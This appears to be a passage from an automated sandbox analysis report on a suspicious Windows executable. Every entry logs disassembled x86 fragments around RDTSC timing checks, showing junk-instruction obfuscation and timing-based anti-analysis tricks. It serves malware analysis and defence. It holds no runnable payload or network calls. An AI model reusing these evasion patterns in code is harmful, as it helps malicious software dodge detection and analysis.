Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B056F second address: 10B0580 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FFB34C126BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B0AA4 second address: 10B0AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B0BD2 second address: 10B0BE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B0BE9 second address: 10B0BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B0E82 second address: 10B0E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFB34C126B6h 0x0000000a jbe 00007FFB34C126B6h 0x00000010 jg 00007FFB34C126B6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B0E99 second address: 10B0E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B0E9F second address: 10B0EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B3E5A second address: 10B3E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B3F96 second address: 10B3FCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FFB34C126B6h 0x00000009 jng 00007FFB34C126B6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007FFB34C126C9h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push ebx 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B4253 second address: 10B42B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 jbe 00007FFB34E3B6C8h 0x0000000c push dword ptr [ebp+122D2266h] 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FFB34E3B6C8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c call 00007FFB34E3B6C9h 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 jmp 00007FFB34E3B6D6h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B42B0 second address: 10B42C6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFB34C126BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B42C6 second address: 10B42CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B42CA second address: 10B42EC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFB34C126B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 jnp 00007FFB34C126B6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jns 00007FFB34C126B6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B42EC second address: 10B42F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B6DC4 second address: 10B6DD4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jl 00007FFB34C126D8h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B6DD4 second address: 10B6DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0023 second address: 4CF0029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0029 second address: 4CF004C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFB34E3B6CEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF004C second address: 4CF0096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FFB34C126BBh 0x00000012 pushfd 0x00000013 jmp 00007FFB34C126C8h 0x00000018 and ecx, 3262CEA8h 0x0000001e jmp 00007FFB34C126BBh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0096 second address: 4CF00A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov cl, dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF00A8 second address: 4CF00AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF00AC second address: 4CF00B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF00B2 second address: 4CF00B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF00B8 second address: 4CF00BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF00BC second address: 4CF00C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0D3F second address: 4CD0D9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FFB34E3B6D0h 0x0000000b xor ecx, 5A86DE58h 0x00000011 jmp 00007FFB34E3B6CBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FFB34E3B6CBh 0x00000024 sbb si, 251Eh 0x00000029 jmp 00007FFB34E3B6D9h 0x0000002e popfd 0x0000002f mov cx, A6E7h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0D9E second address: 4CD0DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34C126C8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0DBA second address: 4CD0DF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, cx 0x00000012 pushfd 0x00000013 jmp 00007FFB34E3B6CEh 0x00000018 or eax, 4B2744A8h 0x0000001e jmp 00007FFB34E3B6CBh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20119 second address: 4D2011D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2011D second address: 4D20128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov di, ax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB012C second address: 4CB0134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0134 second address: 4CB0163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esp 0x00000008 jmp 00007FFB34E3B6CCh 0x0000000d mov dword ptr [esp], ebp 0x00000010 jmp 00007FFB34E3B6D0h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0163 second address: 4CB0167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0167 second address: 4CB016D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB016D second address: 4CB01B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFB34C126BEh 0x00000013 add eax, 3FCF2828h 0x00000019 jmp 00007FFB34C126BBh 0x0000001e popfd 0x0000001f pushad 0x00000020 mov ecx, 02D32A35h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB01B2 second address: 4CB01D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push dword ptr [ebp+0Ch] 0x00000009 jmp 00007FFB34E3B6CEh 0x0000000e push dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov si, dx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0224 second address: 4CB022F instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 mov ah, FEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB022F second address: 4CB024E instructions: 0x00000000 rdtsc 0x00000002 mov edi, 0B2AC090h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFB34E3B6D2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0ADE second address: 4CD0AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0AE2 second address: 4CD0AFE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 7C730A1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, ecx 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFB34E3B6CDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0AFE second address: 4CD0B74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFB34C126C7h 0x00000009 sbb esi, 5297BBCEh 0x0000000f jmp 00007FFB34C126C9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 jmp 00007FFB34C126BDh 0x0000001e xchg eax, ebp 0x0000001f jmp 00007FFB34C126BEh 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FFB34C126C7h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0B74 second address: 4CD0B8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, E14Ah 0x00000007 mov edi, 463AC816h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov di, cx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0B8C second address: 4CD0B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0672 second address: 4CD0676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0676 second address: 4CD067C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD067C second address: 4CD0685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 5784h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0685 second address: 4CD06BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 jmp 00007FFB34C126C6h 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFB34C126C7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0621 second address: 4CD0627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0334 second address: 4CD034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 08ACEABAh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ax, di 0x00000014 mov bl, 76h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD034B second address: 4CD035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34E3B6CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0338 second address: 4CF037E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushfd 0x00000007 jmp 00007FFB34C126C3h 0x0000000c xor ecx, 40CEAFFEh 0x00000012 jmp 00007FFB34C126C9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov cx, FB55h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF037E second address: 4CF0384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0384 second address: 4CF0388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0388 second address: 4CF03EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007FFB34E3B6CDh 0x00000013 movzx eax, bx 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007FFB34E3B6CDh 0x0000001d or eax, 0FEEAE46h 0x00000023 jmp 00007FFB34E3B6D1h 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, ebp 0x0000002b jmp 00007FFB34E3B6CEh 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push edi 0x00000036 pop ecx 0x00000037 push ebx 0x00000038 pop esi 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD04DA second address: 4CD0525 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFB34C126BBh 0x00000013 adc ax, 32DEh 0x00000018 jmp 00007FFB34C126C9h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0525 second address: 4CD05A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFB34E3B6D3h 0x00000009 sub eax, 6BFA6CEEh 0x0000000f jmp 00007FFB34E3B6D9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b pushad 0x0000001c mov cx, di 0x0000001f pushfd 0x00000020 jmp 00007FFB34E3B6D5h 0x00000025 and cx, 03D6h 0x0000002a jmp 00007FFB34E3B6D1h 0x0000002f popfd 0x00000030 popad 0x00000031 mov ax, 3347h 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD05A0 second address: 4CD05A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD05A4 second address: 4CD05AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD05AA second address: 4CD05BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34C126BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD05BB second address: 4CD05BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0E9C second address: 4CE0EA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0EA2 second address: 4CE0EB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34E3B6CDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0EB3 second address: 4CE0EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0EB7 second address: 4CE0ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FFB34E3B6CAh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0ED3 second address: 4CE0ED9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0ED9 second address: 4CE0F2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FFB34E3B6CEh 0x00000012 and ax, 62C8h 0x00000017 jmp 00007FFB34E3B6CBh 0x0000001c popfd 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 call 00007FFB34E3B6CDh 0x00000029 pop esi 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CF0170 second address: 4CF01F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, cl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FFB34C126BAh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FFB34C126BDh 0x00000018 or ax, FB06h 0x0000001d jmp 00007FFB34C126C1h 0x00000022 popfd 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FFB34C126C3h 0x0000002f sbb ax, AA3Eh 0x00000034 jmp 00007FFB34C126C9h 0x00000039 popfd 0x0000003a call 00007FFB34C126C0h 0x0000003f pop ecx 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D105F5 second address: 4D1060D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34E3B6D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D1060D second address: 4D10693 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FFB34C126C9h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007FFB34C126BEh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FFB34C126BDh 0x00000022 adc ecx, 762D25C6h 0x00000028 jmp 00007FFB34C126C1h 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007FFB34C126C0h 0x00000034 and ch, 00000068h 0x00000037 jmp 00007FFB34C126BBh 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10693 second address: 4D1077A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 pushfd 0x00000006 jmp 00007FFB34E3B6D0h 0x0000000b add ecx, 446FD0C8h 0x00000011 jmp 00007FFB34E3B6CBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ecx 0x0000001b pushad 0x0000001c movzx ecx, di 0x0000001f pushfd 0x00000020 jmp 00007FFB34E3B6D1h 0x00000025 add ecx, 0B4F41E6h 0x0000002b jmp 00007FFB34E3B6D1h 0x00000030 popfd 0x00000031 popad 0x00000032 push eax 0x00000033 jmp 00007FFB34E3B6D1h 0x00000038 xchg eax, ecx 0x00000039 jmp 00007FFB34E3B6CEh 0x0000003e mov eax, dword ptr [76FB65FCh] 0x00000043 jmp 00007FFB34E3B6D0h 0x00000048 test eax, eax 0x0000004a pushad 0x0000004b mov di, si 0x0000004e mov ebx, eax 0x00000050 popad 0x00000051 je 00007FFBA705E8FFh 0x00000057 jmp 00007FFB34E3B6D4h 0x0000005c mov ecx, eax 0x0000005e jmp 00007FFB34E3B6D0h 0x00000063 xor eax, dword ptr [ebp+08h] 0x00000066 jmp 00007FFB34E3B6D1h 0x0000006b and ecx, 1Fh 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 push edx 0x00000072 pop esi 0x00000073 mov dx, 4F4Ah 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D1077A second address: 4D1079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 call 00007FFB34C126C3h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f ror eax, cl 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D1079F second address: 4D107A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D107A3 second address: 4D107B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D107B3 second address: 4D1083A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007FFB34E3B6CDh 0x0000000c xor al, FFFFFFD6h 0x0000000f jmp 00007FFB34E3B6D1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 leave 0x00000019 pushad 0x0000001a mov edi, esi 0x0000001c push esi 0x0000001d pushfd 0x0000001e jmp 00007FFB34E3B6CFh 0x00000023 sub cl, 0000000Eh 0x00000026 jmp 00007FFB34E3B6D9h 0x0000002b popfd 0x0000002c pop esi 0x0000002d popad 0x0000002e retn 0004h 0x00000031 nop 0x00000032 mov esi, eax 0x00000034 lea eax, dword ptr [ebp-08h] 0x00000037 xor esi, dword ptr [00E02014h] 0x0000003d push eax 0x0000003e push eax 0x0000003f push eax 0x00000040 lea eax, dword ptr [ebp-10h] 0x00000043 push eax 0x00000044 call 00007FFB38D8BE1Ch 0x00000049 push FFFFFFFEh 0x0000004b jmp 00007FFB34E3B6D7h 0x00000050 pop eax 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 push ebx 0x00000055 pop esi 0x00000056 mov dx, 3282h 0x0000005a popad 0x0000005b rdtsc
